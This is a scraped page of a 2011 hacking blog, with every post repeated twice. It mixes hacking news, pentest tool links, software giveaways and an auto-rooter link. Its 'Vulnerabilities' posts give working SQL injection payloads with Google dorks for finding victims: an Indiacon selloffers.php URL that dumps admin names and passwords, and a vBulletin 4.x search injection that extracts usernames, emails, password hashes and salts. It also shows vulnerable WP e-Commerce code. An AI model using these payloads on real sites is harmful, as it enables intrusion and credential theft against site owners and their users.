... neuere Einträge
Saturday, 23. July 2011
Linux Auto rooter 2011 - Perl
Am Saturday, 23. Jul 2011 im Topic 'Source Code'
Source
http://pastebin.com/91J6dWZE
http://pastebin.com/91J6dWZE
Password Cracking Guide
Am Saturday, 23. Jul 2011 im Topic 'Tutorials'
Here is the table of contents:
http://pastebin.com/EtHsJr4B
Download PDF:
http://tools.question-defense.com/Cracking_Passwords_Guide.pdf
http://pastebin.com/EtHsJr4B
Download PDF:
http://tools.question-defense.com/Cracking_Passwords_Guide.pdf
Friday, 22. July 2011
Avast Internet Security - Pro "Free"
Am Friday, 22. Jul 2011 im Topic 'News'
Avast Internet Security 6 costs $49.99/year regularly but everyone can now grab a 100% genuine license.
Follow below steps to grab free Avast Internet Security 6.0
Click here
http://www.my-avast.de/AVAST-Aktion-com-so-gehts
to vist promo page
enter your firstname then lastname and email-id
you will recive a mail from avast team with license details
Follow below steps to grab free Avast Internet Security 6.0
Click here
http://www.my-avast.de/AVAST-Aktion-com-so-gehts
to vist promo page
enter your firstname then lastname and email-id
you will recive a mail from avast team with license details
Harvard researcher Aaron Swartz arrested
Am Friday, 22. Jul 2011 im Topic 'News'
He faces up to 35 years in prison and $US1 million ($932 million) in fines for charges including wire fraud and computer fraud. He was released on a $US100,000 unsecured bond.
Source
http://www.stuff.co.nz/technology/digital-living/5313899/Harvard-fellow-charged-with-hacking
Source
http://www.stuff.co.nz/technology/digital-living/5313899/Harvard-fellow-charged-with-hacking
Indiacon selloffers.php - SQL
Am Friday, 22. Jul 2011 im Topic 'Vulnerabilities'
Dork : inurl:selloffers.php?cid= "Powered by indiacon.com"
Exploite:
www.victim.com/selloffers.php?cid=9/**/union/**/select/**/1,concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6,7,8/**/from/**/auto_admin
by
Ehsan_Hp200
Exploite:
www.victim.com/selloffers.php?cid=9/**/union/**/select/**/1,concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6,7,8/**/from/**/auto_admin
by
Ehsan_Hp200
Anonymous Lulzsec Statement
Am Friday, 22. Jul 2011 im Topic 'News'
Source
http://www.npr.org/2011/07/20/138555799/fbi-arrests-alleged-anonymous-hackers
Statement
http://pastebin.com/RA15ix7S
http://www.npr.org/2011/07/20/138555799/fbi-arrests-alleged-anonymous-hackers
Statement
http://pastebin.com/RA15ix7S
ANONOPS IRC IP Leak
Am Friday, 22. Jul 2011 im Topic 'News'
By: anontangodown
Found in Pastebin
Found in Pastebin
Thursday, 21. July 2011
Vbulletin 4.0.x => 4.1.3 - SQL
Am Thursday, 21. Jul 2011 im Topic 'Vulnerabilities'
Google Dork: intitle: powered by Vbulletin 4
Vulnerable Code:
File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
Source
http://pastebin.com/0L6tCjM3
Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
by FB1H2S
Vulnerable Code:
File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
Source
http://pastebin.com/0L6tCjM3
Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
by FB1H2S
PCSuite Defrag PRO
Am Thursday, 21. Jul 2011 im Topic 'Tools'
Features of PCSuite Defrag PRO
Innovative 3-zone optimization provides your hard drive with maximum protection
New optimization methods
Clear representation of fragmentation level
No perceptible slowing down during the defragmentation process allows you to carry on working on your PC as normal
Flexible use (9 defragmentation methods, task scheduling, exception list)
Works on Windows 7, Vista and XP.
Follow below steps to grab free Registration key for PCSuite Defrag PRO.
Click here
"http://manager.markement.com/defrag_pcw.php?hs=30e4d9df0f760eee3a46dfe8f8538f80"
to visit promo page
Enter your details, e-mail-id, name, etc..
Now check your email you will receive an email from “info@markement.com” with your free license key. Due to high demand, the license request may take up to 24 hours to process.
Innovative 3-zone optimization provides your hard drive with maximum protection
New optimization methods
Clear representation of fragmentation level
No perceptible slowing down during the defragmentation process allows you to carry on working on your PC as normal
Flexible use (9 defragmentation methods, task scheduling, exception list)
Works on Windows 7, Vista and XP.
Follow below steps to grab free Registration key for PCSuite Defrag PRO.
Click here
"http://manager.markement.com/defrag_pcw.php?hs=30e4d9df0f760eee3a46dfe8f8538f80"
to visit promo page
Enter your details, e-mail-id, name, etc..
Now check your email you will receive an email from “info@markement.com” with your free license key. Due to high demand, the license request may take up to 24 hours to process.
WATOBO - Web Application Toolbox
Am Thursday, 21. Jul 2011 im Topic 'Pentest'
Functions of WATOBO:
Supports session management.
Detects logout and automatically takes a re-login.
Supports filter functions
Inline-Encoder/Decoder
Includes vulnerability scanner
Quick-scan for targeted scanning a URL
Full-scan to scan a whole session
Manual request editor with special functions
Session information is updated
Login can be done automatically
Transcoder
URL, Base64, MD5, SHA-1
Interceptor
Fuzzer
Free, Stable and Open source!
Script code easy to understand
Easy to extend / adapt
In real-world scenarios tested and developed
Speed / usability
Active and Passive checks
Download
http://sourceforge.net/projects/watobo/files/
Video Tutorials:
http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Videos
BackTrack 5
Source:Download and installation
http://pastebin.com/cnsM6dkS
Supports session management.
Detects logout and automatically takes a re-login.
Supports filter functions
Inline-Encoder/Decoder
Includes vulnerability scanner
Quick-scan for targeted scanning a URL
Full-scan to scan a whole session
Manual request editor with special functions
Session information is updated
Login can be done automatically
Transcoder
URL, Base64, MD5, SHA-1
Interceptor
Fuzzer
Free, Stable and Open source!
Script code easy to understand
Easy to extend / adapt
In real-world scenarios tested and developed
Speed / usability
Active and Passive checks
Download
http://sourceforge.net/projects/watobo/files/
Video Tutorials:
http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Videos
BackTrack 5
Source:Download and installation
http://pastebin.com/cnsM6dkS
WLAN Security Megaprimer DVD - Wi-Fi Hacking
Am Thursday, 21. Jul 2011 im Topic 'Web Security'
WLAN Security Megaprimer DVD Released - 10+ hours of Wi-Fi Hacking and Pwnage !
Download
1. Mirror:
http://private.chaos-darmstadt.de/~alech/securitytube/WLAN-Security-Megaprimer-v1.iso
2. Mirror:
http://security.kokelnet.de/WLAN-Security-Megaprimer-v1.iso
3. Mirror:
http://mirror2.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso
http://mirror.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso
Download
1. Mirror:
http://private.chaos-darmstadt.de/~alech/securitytube/WLAN-Security-Megaprimer-v1.iso
2. Mirror:
http://security.kokelnet.de/WLAN-Security-Megaprimer-v1.iso
3. Mirror:
http://mirror2.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso
http://mirror.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso
Wednesday, 20. July 2011
Top 100 Malware Removal Tool
Am Wednesday, 20. Jul 2011 im Topic 'Malware Search'
This utility removes or disinfects the top 100 e-threats recorded by BitDefender in June 2011. This is the 32-bit version of the tool
http://www.malwarecity.com/community/index.php?app=downloads&module=display§ion=download&do=confirm_download&hash=3d60171995aa22f75f66def5b9b5aa53
for 64-bit operating systems please use the Top 100 Removal Tool June 2011 64-bit application.
http://www.malwarecity.com/community/index.php?app=downloads&module=display§ion=download&do=confirm_download&hash=69500a991a0ae16592b46ff32ecb9093
http://www.malwarecity.com/community/index.php?app=downloads&module=display§ion=download&do=confirm_download&hash=3d60171995aa22f75f66def5b9b5aa53
for 64-bit operating systems please use the Top 100 Removal Tool June 2011 64-bit application.
http://www.malwarecity.com/community/index.php?app=downloads&module=display§ion=download&do=confirm_download&hash=69500a991a0ae16592b46ff32ecb9093
exploitdbee.py – Easily Search For Exploits - Python
Am Wednesday, 20. Jul 2011 im Topic 'Source Code'
This is a simple Python tool to help you search for exploits in the BackTrack Exploit Database.
Features
Search the exploitdb archive
Case sensitive & insensitive
Change output mode
Automatically copy your exploits
Requirements
python (tested with python 2.7.1 and 2.5.2)
local exploitdb (pre-installed on BackTrack Linux)
Usage
exploitdbee.py [-c] [-d path]
exploitdbee.py "windows 7" remote
exploitdbee.py -c Microsoft IIS -d /tmp
Download
http://dandies.org/releases/files/exploitdbee.py
Backtrack
http://securityxploit.blogger.de/stories/1857029/
Features
Search the exploitdb archive
Case sensitive & insensitive
Change output mode
Automatically copy your exploits
Requirements
python (tested with python 2.7.1 and 2.5.2)
local exploitdb (pre-installed on BackTrack Linux)
Usage
exploitdbee.py [-c] [-d path]
exploitdbee.py "windows 7" remote
exploitdbee.py -c Microsoft IIS -d /tmp
Download
http://dandies.org/releases/files/exploitdbee.py
Backtrack
http://securityxploit.blogger.de/stories/1857029/
winAUTOPWN
Am Wednesday, 20. Jul 2011 im Topic 'Pentest'
winAUTOPWN v....
This version covers almost all remote exploits up-till mid-July 2011 and a few older ones as well.This version incorporates a few new commandline parameters: -perlrevshURL (for a PERL Reverse Shell URL), -
mailFROM (smtpsender) and -mailTO (smtpreceiver).These are the commandline arguments required for a few exploits which require remote connect-back using a perl shell and email server exploits requiring authentication respectively.This version also tackles various internal bugs and fixes them.
Download
http://120.61.168.139/w/download.htm
This version covers almost all remote exploits up-till mid-July 2011 and a few older ones as well.This version incorporates a few new commandline parameters: -perlrevshURL (for a PERL Reverse Shell URL), -
mailFROM (smtpsender) and -mailTO (smtpreceiver).These are the commandline arguments required for a few exploits which require remote connect-back using a perl shell and email server exploits requiring authentication respectively.This version also tackles various internal bugs and fixes them.
Download
http://120.61.168.139/w/download.htm
BackTrack 5 Release 1 - 10th of August,2011
Am Wednesday, 20. Jul 2011 im Topic 'News'
BackTrack 5 R1 (Release one) will be available for download on the 10th of August,2011. This will complete our first 3 month cycle since the last release. With over 100 bug fixes, numerous package updates and the addition of over 30 new tools and scripts. BackTrack Crew will have a pre-release event of BackTrack 5 R1 at the BlackHat / Defcon Conference a few days earlier.
Backtrack5
http://securityxploit.blogger.de/stories/1847157/
Backtrack5
http://securityxploit.blogger.de/stories/1847157/
16 Suspected 'Anonymous' Hackers Arrested
Am Wednesday, 20. Jul 2011 im Topic 'News'
16 Suspected 'Anonymous' Hackers Arrested in Nationwide Sweep
19.07.11 22:32 Sixteen suspected members of "Anonymous" were arrested this morning in states including Florida, New Jersey and California, in what appears to be a nationwide takedown of the notorious hacking group, FoxNews.com has exclusively learned.
The arrests and the 30 to 40 search warrants issued by the feds Tuesday are part of an ongoing investigation into Anonymous, which has claimed responsibility for numerous cyberattacks against a variety of websites including Visa and Mastercard.
19.07.11 22:32 Sixteen suspected members of "Anonymous" were arrested this morning in states including Florida, New Jersey and California, in what appears to be a nationwide takedown of the notorious hacking group, FoxNews.com has exclusively learned.
The arrests and the 30 to 40 search warrants issued by the feds Tuesday are part of an ongoing investigation into Anonymous, which has claimed responsibility for numerous cyberattacks against a variety of websites including Visa and Mastercard.
Tuesday, 19. July 2011
Microsoft offers $250,000 of Rustock Botnet
Am Tuesday, 19. Jul 2011 im Topic 'News'
Microsoft Declares "Today, we take our pursuit a step further. After publishing notices in two Russian newspapers last month to notify the Rustock operators of the civil lawsuit, we decided to augment our civil discovery efforts to identify those responsible for controlling the notorious Rustock botnet by issuing a monetary reward in the amount of $250,000 for new information.
Source
http://www.zdnet.com/blog/hardware/microsoft-offering-250000-reward-for-rustock-botnet-info/13741
Source
http://www.zdnet.com/blog/hardware/microsoft-offering-250000-reward-for-rustock-botnet-info/13741
NetSecL v.3.2
Am Tuesday, 19. Jul 2011 im Topic 'Pentest'
NetSecL is a hardened,live and installable OS based on OpenSuse suitable for Desktop/Server and Penetration testing. Once installed you can fully enjoy the features of GrSecurity hardened kernel and penetration tools OR use the penetration tools directly from your live DVD.
Installation PDF:
http://rsync.netsecl.com/netsecl_3.2.pdf
Download:
http://susegallery.com/a/EmL6GN/netsecltoolset
Installation PDF:
http://rsync.netsecl.com/netsecl_3.2.pdf
Download:
http://susegallery.com/a/EmL6GN/netsecltoolset
WP e-Commerce <= 3.8.4 - SQL
Am Tuesday, 19. Jul 2011 im Topic 'Vulnerabilities'
Download link:
http://wordpress.org/extend/plugins/wp-e-commerce
Google Dork:
inurl:page_id= "Your billing/contact details"
Bugged code (wpsc-theme/functions/wpsc-user_log_functions.php):
foreach ( (array)$_POST['collected_data'] as $value_id => $value ) {
$form_sql = "SELECT * FROM `" . WPSC_TABLE_CHECKOUT_FORMS . "` WHERE
`id` = '$value_id' LIMIT 1?;
$form_data = $wpdb->get_row( $form_sql, ARRAY_A );
FIX:
Upgrade to new version
http://wordpress.org/extend/plugins/wp-e-commerce
Google Dork:
inurl:page_id= "Your billing/contact details"
Bugged code (wpsc-theme/functions/wpsc-user_log_functions.php):
foreach ( (array)$_POST['collected_data'] as $value_id => $value ) {
$form_sql = "SELECT * FROM `" . WPSC_TABLE_CHECKOUT_FORMS . "` WHERE
`id` = '$value_id' LIMIT 1?;
$form_data = $wpdb->get_row( $form_sql, ARRAY_A );
FIX:
Upgrade to new version
PHP/HTML Redirection
Am Tuesday, 19. Jul 2011 im Topic 'Source Code'
Source
http://pastebin.com/t5Y79711
http://pastebin.com/t5Y79711
... ältere Einträge